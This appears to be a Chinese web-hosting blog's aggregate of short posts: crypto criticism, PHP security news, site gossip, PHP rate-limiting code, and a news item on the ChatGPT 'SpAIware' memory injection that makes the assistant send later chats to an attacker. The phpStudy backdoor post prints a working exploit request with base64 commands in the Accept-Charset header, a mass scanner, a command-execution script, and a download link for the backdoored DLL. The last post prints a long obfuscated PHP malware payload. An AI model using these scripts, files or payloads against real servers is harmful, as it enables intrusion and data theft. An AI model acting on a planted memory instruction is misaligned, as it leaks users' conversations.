哈里斯在接受美国科技媒体ReCode采访时称:“我厌倦了说‘当心,这是投机’,‘当心,这是赌博’,‘当心,这是泡沫’。好吧,我要实话实说:比特币就是一个骗局。” 他表示,这一骗局的“输家是那些信息不灵通的买家,陷入了贪婪的漩涡之中。结果是大量财富从普通家庭转移到互联网推手手中。” 哈里斯接着驳斥了支持者声称比特币有价值的所有理由。他表示,比特币不是一种支付方式,因为它几乎没有被任何地方接受。比特币的极端波动性使它作为一种价值存储也不受欢迎。最后,所谓比特币的感知价值仅仅是“大傻瓜理论”的一个例子。 哈里斯还表示:“加密货币最适合一种用途:犯罪活动。”甚至连普通用户也在藐视法律,避免为对每一笔交易缴税。 #### PC 版 ChatGPT 客户端曝“记忆”功能漏洞 9 月 27 日消息,OpenAI 在今年 2 月宣布为 ChatGPT 推出记忆(Memory)的功能,今年 9 月初这项功能正式向所有用户开放,该功能的主要用途是“设定预设”,从而帮助 AI 向用户更符合需求的答案。 不过研究人员 Johann Rehberger 目前披露报告,称这项功能在 PC 版 ChatGPT 客户端上存在漏洞,黑客可借漏洞获取用户对话记录。 Johann Rehberger 将这项漏洞称为 SpAIware,他表示黑客可通过钓鱼形式让受害者在 PC 版 ChatGPT 客户端中上传特定文件 / 特定网址让 AI 分析,一旦分析成功,AI 便会“记住将用户的后续对话内容分享至黑客”,目前 OpenAI 已发布新版应用进行修补。 On September 27th, news emerged that OpenAI announced the Memory feature for ChatGPT in February of this year, and this feature officially became available to all users at the beginning of September. The main purpose of this feature is to "set presets" to help AI provide answers that better meet users' needs.However, researcher Johann Rehberger has recently disclosed a report stating that there is a vulnerability in this feature on the PC version of the ChatGPT client, which hackers can exploit to access users' conversation records.Johann Rehberger named this vulnerability SpAIware, and he stated that hackers could use phishing tactics to trick victims into uploading specific files or URLs on the PC version of the ChatGPT client for AI analysis. Once the analysis is successful, the AI would "remember to share the user's subsequent conversation content with the hacker." OpenAI has since released a new version of the application to patch the vulnerability. #### pc6下载站又复活了 之前有说过PC6凉了,没想到今天有消息称又恢复访问了,主机帮看下,确实恢复了,很神奇。 之前查看是阿里云停止解析了,说明是相关部门要求关停的,没想到居然可以恢复?! 主机帮特地去查了下,域名注册商已经从阿里云换成了Gname.com 这是一家国外的域名注册商,看来PC6是被阿里坑惨了,阿里云对待监管要求都是一刀切,只要相关要求,就会直接停止解析,都不跟你商量一下的,之前国内的码云开源网站就中过招。 不过,换到国外意味着就备不了案,因为ICP备案是不支持国外域名注册商的。 PC6真的能原地复活吗?打个问号? 目前来看,PC6可能是已经卖了,接手方打算重新运营,所以打算办理相关资质,毕竟PC6的相关权重相当高,想要恢复排名不是难事,难的是如何获得国内合法合规资质,要知道这种大站,要求相当多的。 总之,希望PC6能复活吧,毕竟国内网站越来越少了,以后会不会搜索引擎搜不到内容了,那太可怕了。 #### PC6下载站疑被卖后非法违规域名被阿里云停止解析 上周主机吧还说过PC6卖了,结果今天发现PC6.com域名状态为clientHold。 域名clientHold状态是域名管理中的一个特殊状态,它表明域名已被注册商或注册局暂停解析,通常是由于域名注册者未能遵守某些规定或条款,如未完成实名认证、支付费用、存在违规内容等原因导致的。在此状态下,域名无法正常访问,直到问题解决后才能恢复正常。 而PC6已经运营这么多年了,不可能实名认证问题,那么只有一个原因是内容存在违规内容被阿里云停了,当然一般域名存在违规内容阿里云是不会主动停止解析的,只有当监管相关机构要求才会停止。 惊动到监管机构的域名,基本上是凉了,想恢复基本不大可能。 而且被clientHold的域名是不支持转移的,也就说,PC6.com这个域名基本上是用不了。 主机吧猜测PC6原运营商应该把网站卖做BC的人了,结果那做BC的人是一个新手,拿到域名不第一时间转移出去,而是留在阿里云,那想封你域名不是简单的一句话的事? 这次对方损失巨大哈。 #### Permalink Manager Lite:更改wordpress旧固定链接重定向至新链接插件 Permalink Manager是一款最高级、评级最高的WordPress Permalink编辑器,可帮助WordPress用户控制所有帖子、页面、自定义帖子类型元素的URL地址。为避免在定义新的自定义永久链接后出现404或重复的内容错误,尝试访问旧永久链接的访问者将自动重定向到新的自定义URL。 该插件支持所有自定义帖子类型和自定义分类以及流行的第三方插件,包括WooCommerce、Yoast SEO、WPML和Polylang。为了进一步提高SEO性能,插件设置提供了禁用规范重定向(WordPress本机使用)和控制尾部斜杠设置的可能性。 主机吧目前就是用这款插件对之前的固定链接进行更改,重定向的,效果还不错,推荐使用! #### PHP 开源项目 ADOdb 发布 v5.22.9 版本,修复 CVSS 满分严重安全漏洞 5 月 5 日消息,PHP 开源项目 ADOdb 于上周推出 v5.22.9 版本。该版本着重修复了一项极为严重的安全漏洞 ——CVE-2025-46337,其 CVSS 风险评分达到满分 10 分。官方指出,该漏洞 “可能波及全球 280 万个已安装 ADOdb 的环境”,影响范围广泛,情况不容乐观 。 作为广受欢迎的 PHP 数据库抽象层组件,ADOdb 凭借统一的 API 接口,为开发者提供了极大便利。借助它,开发者能够以相同的语法访问多种类型的数据库,涵盖 MySQL、PostgreSQL、SQLite、Oracle、Microsoft SQL Server、IBM DB2 以及 Sybase 等,在数据库交互开发中发挥着重要作用。 此次曝光的 CVE-2025-46337 属于 SQL 注入漏洞,存在于 ADOdb 库的 PostgreSQL 驱动中。当程序通过 ADOdb 连接 PostgreSQL 数据库时,若开发者调用 pg_insert_id () 函数,并传入未经处理的用户输入,且未进行恰当的转义操作,便会触发该漏洞。届时,黑客将得以远程执行任意 SQL 命令,严重威胁数据安全。 该漏洞的影响范围涉及多个 PostgreSQL 驱动版本,包括 postgres64、postgres7、postgres8 和 postgres9。据官方表示,在最糟糕的情形下,黑客甚至能够完全掌控 SQL 执行流程,进而窃取、删除数据,甚至远程运行恶意代码。因此,官方强烈督促开发者尽快将 ADOdb 升级至 v5.22.9 版本,以消除安全隐患。项目 GitHub 页面链接为(https://github.com/ADOdb/ADOdb/releases),用户可前往获取最新版本。 值得一提的是,这一漏洞由安全研究人员 Marco Napp 发现并提交。Marco Napp 原本专注于黑盒渗透测试,近期为深入理解白盒测试,他采用静态应用安全测试(Static Application Security Testing)方法,利用 SonarQube 静态代码分析工具,对海外高校网站常用的 Moodle 开源项目以及 “VtigerCRM” 客户关系管理系统展开扫描。 在扫描过程中,Marco Napp 在这两个项目中均发现了相同的 SQL 注入漏洞。经过进一步调查,他确定这些漏洞源于两个项目共同依赖的 ADOdb 组件,随后便向官方报告了这一重要安全隐患。此次事件再次凸显了开源项目安全维护的重要性,也提醒开发者及时关注组件更新,确保系统安全。 #### PHP 获德国 STF 基金会 20.5 万欧元投资,用于改进安全性及支持文档 4 月 27 日消息,PHP 近日获得德国 Sovereign Tech Fund (STF) 基金会 20.5 万欧元(投资,相关投资将用于提高 PHP 生态系统的长期可持续性和安全性。 世界上大约 75% 的网站依赖 PHP,目前 PHP 的软件包管理器 Packagist 中已经列出了超过 361000 个软件包,相关软件包安装数量已经超过 500 亿次,因此维护 PHP 生态系统基础设施安全性对互联网尤为重要。 据介绍,PHP 开发人员将使用 STF 提供的 20.5 万欧元资金来解决过时的基础设施、改善 PECL 扩展分发系统、加强安全措施、改进支持文档、开发自动化测试框架、对 PHP 的安全性和代码库审计进行更多改进,并围绕测试工具进行更多开发。 此外,Sovereign Tech Fund 基金会还启动了漏洞弹性计划,该赏金计划主要针对安全研究人员,最初将针对 Sequoia PGP 和 systemd 项目,对于每项负责任的报告 / 修复的漏洞,STF 还为参与项目提供“修复”赏金,不过官方没有公布具体赏金额度。 #### php5.07.0版本年底停更,六成网站面临安全漏洞 Web科技应用现况的调查公司W3Techs近日表示,根据所有网站使用的PHP版本状况,从明年1月1日起,有近62%的网站将因未能获得安全更新而陷入被黑或被植入恶意程序的风险。根据W3Techs的调查,截自本月15日,在其研究的网站样本中,使用PHP的比例高达78.9%,而所有网站使用PHP 5的比例又达到61.8%。细分当中版本,所有网站使用PHP 5.6版的比例为41.5%,为版本5之冠。根据PHP官网列出的支持版本及时程表 (下),PHP 5.6是在2014年推出,主要支持已在2017年1月19日截止,而安全支持也将在2018年12月31日终止。也就是二个半月后,使用PHP 5.6以前版本的网站都将不会再获得安全漏洞或功能臭虫的更新,除非用户付费使用作业系统厂商的更新服务。如果黑客发现并开采了PHP旧版本的漏洞,数百万网站及用户可能立即曝险。事实上PHP 5.6版的主要及安全更新期早就结束,但因使用的网站最多,因而PHP维护组织曾一度分别延长4个月及2年。被某些人描述为PHP定时炸弹的大限中,较新的PHP 7.0更将在今年12月1日EOL(end of lifecycle),不再提供安全支持,连7.1版也将在12月1日终止主要支持,一年后结束安全支持。目前三大网站内容管理系统(CMS)专案中,只有Drupal宣布从明年3月6日起,Drupal支持网页最低要使用PHP 7,建议采用7.1版。Joomla建议为5.6或7版以上,支持下限为5.3.10。Wordpress则建议 PHP 7.2版以上,最低为5.2.4版。ZDNet报导引述WordPress安全元件WordFence研发主管Sean Murphy指出,PHP漏洞攻击者主要目标不是在PHP本身,而是在PHP函式库及CMS系统,但是其他安全专家相信,等大限到来,黑客会更积极在PHP 5.6以前版本中找出漏洞。(源于IT之家)目前wordpress已经全面支持PHP7.1了,如果你还在用的PHP5的,请及时升级,以因漏洞导致网站损失! #### PHPCMS悄无声息的关站了 站长真的凉了? 这几年不仅站长不景气,连程序开发商也跟着不景气,PHPCMS也偷偷关站了。 想想当于站长盛行的时候,各类开源网站程序层出不穷,如dedeCMS、EmpireCMS、JoekoeCMS、ecshop、Discuz、PHPwind、z-blog、wordpress等。现在这些开源程序基本死得差不多了,有的多年没更新了,唯一混得好的也就国外的知名博客程序wordpress了,不过也wordpress在国内估计也快凉了,因为wordpress已经屏蔽国内访问很久了。 难道站长行业要凉了吗?不!这些老牌程序是有很多凉了,但是新的网站程序又冒出来了,他们更适合现在的国内互联网场景,连Discuz、PHPwind两家老牌论坛程序都相继回归,并表示要推出新的适应当下互联网的版本。相较以前个人站长单独独斗不一样,现在很多站长已经不在自己弄程序,自己发内容,自己推广了,而是很多站长用上了更省心的智能建站程序,如耐思尼克的建站宝盒、美橙互联的建站之星、西部数码的云建站,还有凡科自助建站,他们都不需要操心模板程序这些问题,只要站长做好内容、做好推广就行,甚至有些服务商还提供推广服务。 所以并不是站长不在了,而是生存方式不一样了,根据去年的工信部的统计数据,国内每年网站速度都在增涨,只是增涨的没有以前快而以。 #### PhpStudy2016\2018出现后门漏洞修复解决办法 phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOPtimizer不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。由于其免费且方便的特性,在国内有着近百万的PHP语言学习者和开发者用户 后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三方鉴定机构对软件中的“后门”进行司法鉴定,鉴定结果是该“后门”文件具有控制计算机的功能,嫌疑人已通过该后门远程控制下载运行脚本实现收集用户个人信息。在2019年9月20日,网上爆出phpstudy存在“后门”。作者随后发布了声明。 于是想起自己安装过phpstudy软件,赶紧查一下是否存在后门文件,结果一看真存在后门,学个PHP真是不容易,软件被别人偷偷安装了后门。 影响版本 目前已知受影响的phpstudy版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 后门检测分析 通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 用notepad打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在,如图: phpstudy 2018漏洞复现 启动phpstudy,选择php-5.2.17版本,使用burpsuit抓包(如果是本机127.0.0.1环境,代理去掉本地过滤,否则抓不到包)。 大佬给出的exp如下 GET /index.php HTTP/1.1 Host: yourip.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3730.400 QQBrowser/10.5.3805.400 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Charset:这里就是你要执行的代码命令(经过base64加密) Accept-Language: zh-CN,zh;q=0.9 Connection: close 我们修改数据包查看命令phpinfo();执行情况 继续修改数据包查看命令echo system("net user");执行情况 漏洞复现成功 ps:我复现的时候这里有一个坑,就是直接repeater过来的数据包Accept-Encoding字段的参数是gzip, deflate,deflate前面有一个空格,去掉就可以成功执行命令了 后门检测脚本 # !/usr/bin/env python # -*- coding:utf-8 -*- import gevent from gevent import monkey gevent.monkey.patch_all() import requests as rq def file_read(file_name="url.txt"): with open(file_name, "r") as f: return [i.replace("\n", "") for i in f.readlines()] def check(url): ''' if "http://" or "https://" not in url: url = "https://" + url ''' headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==', # 输出 eeSzxu92nIDAb 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', } try: res = rq.get(url, headers=headers, timeout=20) if res.status_code == 200: if res.text.find('eeSzxu92nIDAb'): print("[存在漏洞] " + url) except: print("[超时] " + url) if __name__ == '__main__': print("phpStudy 批量检测 (需要 gevent,requests 库)") print("使用之前,请将URL保存为 url.txt 放置此程序同目录下") input("任意按键开始执行..") tasks = [gevent.spawn(check, url) for url in file_read()] print("正在执行...请等候") gevent.joinall(tasks) wait = input("执行完毕 任意键退出...") 后门执行脚本 # !/usr/bin/env python # -*- coding:utf-8 -*- import requests import base64 def backdoor(url, command="system('calc.exe');"): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==', 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', } command = base64.b64encode(command.encode('utf-8')) command = str(command, 'utf-8') result = requests.get(url, headers=headers, verify=False) if result.status_code == "200": print("执行完成") a = input("任意键退出...") url = input("输入URL(例如:http://127.0.0.1:228/xx.php)\n") command = input("输入命令 默认为 system('calc.exe'); (不想输入直接回车)\n") backdoor(url, command) 源自:https://www.cnblogs.com/liliyuanshangcao/p/11584397.html phpstudy 漏洞复现 下载:http://downinfo.myhostadmin.net/phpxmlrpc.rar 解压 复制文件 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll 覆盖原路径文件即可。 #### phpstudy:免费php+MySQL nginx+apahce傻瓜式控制面板 phpstudy一开始只支持windows系统,最近新出了linux版本的,主机吧看了越来越像宝塔面板了。 功能非常齐全,支持php+MySQL版本切换、nginx+apahce切换等。总之前操作基本跟宝塔差不多。 相对于宝塔,大概就是广告少了,比较简洁,而且收费功能较少,比如防火墙功能,phpstudy就是免费的。   总之非常值得推荐的集成软件,官方地址:https://www.xp.cn/ 有需要同学可以试试。   #### PHP实用的CC攻击防御代码 当遭受CC攻击时,服务器会因为收到大量的请求而负载过高,导致服务不可用。在PHP中可以采用以下方式来防御CC攻击: 使用IP限制 可以通过限制同一IP在一定时间内的请求次数来防御CC攻击。以下是一个简单的PHP示例代码: Copy code <?php $ip = $_SERVER['REMOTE_ADDR']; $cache_key = 'ip-' . $ip; if ($cache_data = apc_fetch($cache_key)) { if ($cache_data >= 10) { // 10秒内最多允许10次请求 header('HTTP/1.1 429 Too Many Requests'); exit; } else { apc_inc($cache_key); } } else { apc_store($cache_key, 1, 10); // 缓存10秒 } ?> 使用HTTP限速 可以通过限制同一IP在一定时间内的网络传输量来防御CC攻击。以下是一个简单的PHP示例代码: <?php $ip = $_SERVER['REMOTE_ADDR']; $cache_key = 'ip-' . $ip; if ($cache_data = apc_fetch($cache_key)) { if ($cache_data >= 1048576) { // 10秒内最多允许1MB传输量 header('HTTP/1.1 429 Too Many Requests'); exit; } else { apc_inc($cache_key, strlen($request_data)); // 增加传输量 } } else { apc_store($cache_key, strlen($request_data), 10); // 缓存10秒 } ?> 以上代码只是示例,具体实现需要根据实际情况进行调整。需要注意的是,以上方法只能提高CC攻击的抵抗能力,无法完全阻止攻击。因此还需要专业云防火墙进行防御。 主机吧推荐云防火墙: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### PHP文件清除wordpress里恶意代码 一些使用wordpress的网站经常会遇到被挂马的情况,这篇文章主要介绍了PHP实现清除wordpress里恶意代码的方法以及相关代码和使用方法,有需要的小伙伴可以参考下,挺实用的。恶意代码示例:!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x5c%x7825ggg!>!#]y81]273]y>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7x7827jsv%x5c%x78256^#zsfvrx5c%x7827&6<%x5c%x787fw6*%x5c%x78825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%%x5c%x7825:|:**t%x5c%xW~!%x5c%x7825z!>21<%x5c%x7825j=6[%x5c%x7825ww2!>5b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutMSVD!-id%x5c%x7825)uqpI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,x7822:ftmbg39*56A:>:8:|:7#6ufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvuc%x7824!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]139]271]y83]256]y78]248]y83]7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%27pd%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825<#3722!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%7825)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace("%x2f%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%xS["%x61%156%x75%156%x61"]=1; function f<5h%x5c%x7825%x5c%x782f#0#%x58]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}25Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c2fh%x5c%x7825:<**#57]38y]4tjyf%x5c%x7860opjudovg%x525bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdyU<#16,47R57,27R66,#%x5c%*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x5c%x7825!<***f%x5c%x78%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5#P#-#Q#-#B#-#T#-#E#-#G#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*WCw*[!%x5c%x7825rN}#QwTW%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%25)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%7827pd%x5c%x78256b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x7825c:>1<%x5c%x7825b:>1%x5c%x782272qj%x5c%x7825)7gj6<**2qj%>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!<*::::::-111112)eobs%x5c%x7861L3]84]y31M6]y3e]81#%x5c%x782f#SFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}X;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]D6M7]K3#<%x5c%xbbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x782)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x784l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x55c%x787fw6<*K)ftpmdXA6|7**197-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78po)##-!#~<#%x5c%x782f%x5c%x7825c%x7824-%x5c%x7824tvctus)%x5x7825)!>>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~2bd%x5c%x7825!2qj%x5c%x78257-K)udfoopdXA%x54!#]y76]277]y72]265]y39]274]y85]273]y66<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:q%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5cx5c%x7824*1<%x5c%x7825j=tj%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c1%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBAL7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5g!)%x5c%x7825z>>2*!%x5c%x7825z>3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]K4]65]D8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x3]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73"66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6x7824<%x5c%x7825j,,*!|%x5c%x7824c%x7822)7gj6<*QDU%x5c%%x785c%x5c%x7825j:^!#]y84]275]y83]248]y83]256c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftc%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qjA)qj3hopmA%x578Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%<*#k#)usbut%x5c%x7860cpg]273]y76]271]y7d]252]y74]256]7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7tsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%xx5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]47825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%xPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x780#)U!%x5c%x7827{**u%x5c%x7825-fd)##Qtpz)#]341]88M4P8825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]2#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z>1*!%x5c%x7825b:]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%e56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTbek!~!bjepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*q%x5c%x7825V<*#fopoV;ho]y81]265]y72]254]y76#<%x5x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!5)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~#]y31]278]y3e]81]K78:569x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWtj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x]y7f#!%x5c%x782400~:Ew:Qb:Qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x25!-#2#%x5c%x782f#%x5c%x7825#%fwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fep>1%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x782{66~6<&w6<%x5c%x787fw6*CW&)